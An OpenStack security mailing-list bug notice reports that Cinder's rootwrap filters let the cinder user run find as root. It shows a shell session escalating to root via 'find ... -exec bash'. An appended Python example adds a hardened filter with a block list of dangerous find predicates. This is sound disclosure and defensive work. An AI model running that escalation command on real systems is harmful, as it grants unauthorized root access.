[Openstack-security] [Bug 1250101] Re: Cinder's rootwrap filters allow to run find as root, which allows arbitrary commands

Jeremy Stanley fungi at yuggoth.org
Tue Nov 12 18:06:57 UTC 2013


I too agree, so I switched it to public with no associated advisory.

** Changed in: ossa
       Status: Incomplete => Invalid

** Information type changed from Private Security to Public

** Tags added: security

-- 
You received this bug notification because you are a member of OpenStack
Security Group, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1250101

Title:
  Cinder's rootwrap filters allow to run find as root, which allows
  arbitrary commands

Status in Cinder:
  New
Status in Oslo - a Library of Common OpenStack Code:
  Invalid
Status in OpenStack Security Advisories:
  Invalid

Bug description:
  The patch
  https://github.com/openstack/cinder/commit/688c515b9d662486395d36c303ca599376a1dc0d
  added the find command to etc/cinder/rootwrap.d/volume.filters. This
  introduces a security hole as the find command is able to call exec,
  and so the cinder user can run any command as root. For example:

  vagrant@controller:~$ sudo -u cinder bash
  cinder@controller:~$ id
  uid=109(cinder) gid=115(cinder) groups=115(cinder)

  cinder@controller:~$ sudo /usr/bin/cinder-rootwrap /etc/cinder/rootwrap.conf find /etc/hosts -exec bash \;

  root@controller:~# id
  uid=0(root) gid=0(root) groups=0(root)

  
  I guess the way to fix this is to add a FindFilter to Oslo that rejects calls to find with the -exec or -execdir argument.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1250101/+subscriptions




More information about the Openstack-security mailing list
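The bug above is the classic rootwrap failure mode: a filter that matches on the executable name alone ("find") lets the caller pass any arguments, and `find` can be told to run commands or write files as root. The following is an added example, not code from Cinder or oslo.rootwrap, showing the permissive filter next to a hardened `FindFilter` of the kind the reporter suggests. The class names, the `match(userargs)` method shape and the `FORBIDDEN` set are this example's own assumptions; it goes slightly beyond the report by also refusing `-ok`/`-okdir` (which also execute commands) and the predicates that write files as the invoking user.

```python
"""Rootwrap-style argument filtering for ``find``, as an added example.

Not oslo.rootwrap or Cinder code: the classes, method names and the
FORBIDDEN set below are illustrative assumptions. A rootwrap filter is
modelled here as an object whose ``match(userargs)`` returns True when the
argv submitted by the unprivileged service may be run as root.
"""

import shlex

# GNU find predicates that execute a program (-exec, -execdir, -ok, -okdir)
# or write files (-delete, -fprint*, -fls) as the invoking user, i.e. root
# once rootwrap has escalated. The bug report names -exec and -execdir; the
# rest are included on the same reasoning (assumption of this example).
FORBIDDEN = frozenset({
    "-exec", "-execdir", "-ok", "-okdir",
    "-delete", "-fprint", "-fprint0", "-fprintf", "-fls",
})


class PermissiveFindFilter:
    """The vulnerable shape: match on the program name only.

    This is what a plain executable-name filter for ``find`` amounts to:
    any arguments, including ``-exec bash ;``, are accepted.
    """

    def match(self, userargs):
        return bool(userargs) and userargs[0] == "find"


class FindFilter:
    """Hardened filter: ``find`` is allowed, its dangerous predicates are not."""

    def __init__(self, exec_path="/usr/bin/find", run_as="root"):
        # exec_path / run_as mirror what a rootwrap filter line carries;
        # they are not consulted by match() and exist only for realism.
        self.exec_path = exec_path
        self.run_as = run_as

    def match(self, userargs):
        if not userargs or userargs[0] != "find":
            return False
        # Fail closed: refuse a forbidden token anywhere on the line, even
        # where it might only be the value of another predicate (for
        # example ``-name -exec``). find's grammar is too permissive to
        # parse safely here, and a false rejection is the cheap error.
        return not any(arg in FORBIDDEN for arg in userargs[1:])


def first_matching_filter(cmdline, filters):
    """Emulate rootwrap's decision: split the submitted command line the
    way a shell would and return the first filter that accepts it, or
    None when the command must be refused."""
    userargs = shlex.split(cmdline)
    for f in filters:
        if f.match(userargs):
            return f
    return None


if __name__ == "__main__":
    # The exact escalation from the bug report, plus a benign query.
    escalate = r"find /etc/hosts -exec bash \;"
    benign = "find /var/lib/cinder/volumes -name volume-*"
    for label, filters in (("permissive", [PermissiveFindFilter()]),
                           ("hardened", [FindFilter()])):
        for cmd in (escalate, benign):
            verdict = first_matching_filter(cmd, filters)
            print(f"{label:10s} {'ALLOW' if verdict else 'DENY '} {cmd}")
```

Running it shows the permissive filter allowing both command lines and the hardened one allowing only the benign query. The important design choice is the fail-closed scan of every argument: trying to decide whether a given `-exec` token is "really" a predicate would reproduce GNU find's expression parser inside the privilege boundary, which is exactly where a mistake costs root.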